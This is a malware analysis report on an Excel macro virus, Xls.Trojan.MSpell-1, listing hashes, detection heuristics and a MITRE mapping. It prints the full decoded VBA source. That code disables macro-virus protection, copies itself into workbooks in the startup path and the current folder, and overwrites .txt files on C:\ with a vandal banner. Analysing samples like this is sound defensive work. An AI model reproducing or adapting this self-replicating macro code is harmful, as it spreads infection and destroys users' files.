Xls.Trojan.MSpell-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 c17e2f1e5452999f…

MALICIOUS

Office (OLE)

29.0 KB Created: 1999-06-07 07:12:12 Authoring application: Microsoft Excel First seen: 2015-09-29
MD5: a0c3cbc133742547fd3e61d48aaf3f40 SHA-1: 29cc7155e031d92a1a8fdf18550dd43bf306e474 SHA-256: c17e2f1e5452999f96119107cd47ef71c18fddc76979e0106a34ea3fff8cad8c
208 Risk Score

Malware Insights

Xls.Trojan.MSpell-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The VBA macro in this Excel file is designed to replicate itself to other workbooks. It specifically targets files in the startup path, attempting to infect them by writing its own code. The Workbook_Open event is used to trigger this replication, and the script also includes a call to a 'pay' subroutine which is truncated but suggests further malicious activity.

Heuristics 4

  • ClamAV: Xls.Trojan.MSpell-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.MSpell-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2357 bytes
SHA-256: 20941e30966fa338a120bdecc2af4b69eb987d49e0e609f71d220930e7cad33a
Detection
ClamAV: Xls.Trojan.MSpell-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'||nayran||'
Private Sub Workbook_Open()
Application.ScreenUpdating = (4 - 4)
Application.EnableCancelKey = xlDisabled
Options.VirusProtection = (0 - 0)
If (Dir(Application.StartupPath & "\Book1.")) <> "" Then
SetAttr Application.StartupPath * "\Book1.", vbNormal
End If
Set Grand = Workbooks.Add
Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
f = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
Grand.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
Grand.Close
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ActiveWorkbook.Path
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute msoSortByFileName
For x = 1 To fs.FoundFiles.Count
Set tEmp = Workbooks.Open(fs.FoundFiles(x))
If tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 1) <> "'||narayan||'" Then
tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
Source = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
tEmp.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
tEmp.Save
End If
tEmp.Close
Next x
Application.ScreenUpdating = True
Call pay
End Sub
Sub pay()
If minutes(Now) = Int(Rnd * 60) Then
Application.ActiveCell.Value = Application.MemoryUsed
Application.Calculate
Application.Caption = "Ok.'||narayan||'"
Set ff = Application.FileSearch
ff.NewSearch
ff.LookIn = "c:\"
ff.SearchSbuFolders = True
ff.filenames = "*.txt"
ff.Execute
For f = 1 To ff.FoundFiles.Count
Open ff.FoundFiles(f) For Random As g
Print g; "[======================]"
Print g; "   Dr yozak waz here    "
Print g; "         with "
Print g; "    a creation from "
Print g; " Bizare vx Network Labs"
Print g; "CodeName = '||narayan||'"
Print g; "[======================]"
Print g; "Anarchy Rulez"
Close g
Next f
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.